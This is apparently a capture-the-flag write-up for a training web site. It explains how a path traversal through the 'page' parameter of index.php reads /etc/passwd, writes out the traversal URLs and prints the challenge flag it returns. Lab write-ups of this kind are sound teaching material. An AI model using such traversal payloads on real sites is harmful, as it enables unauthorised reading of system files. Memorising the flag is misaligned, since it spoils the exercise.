If you go to the survey page, the URL is /index.php?page=survey

I tried to do a path traversal to get other files with this type of test :

/index.php?page=../../../../../../../../../../../home/borntosec/readme

The response was an alert that say : You can DO it !!!  :]

So i tried a typical path that can hold usefull information : /etc/passwd

With this url : /index.php?page=../../../../../../../../../../../etc/passwd

The site replies another alert with a flag :
    Congratulaton!! The flag is : b12c4b2cb8094750ae121a676269aa9e2872d07c06e429d25a63196ec1c8c1d0 
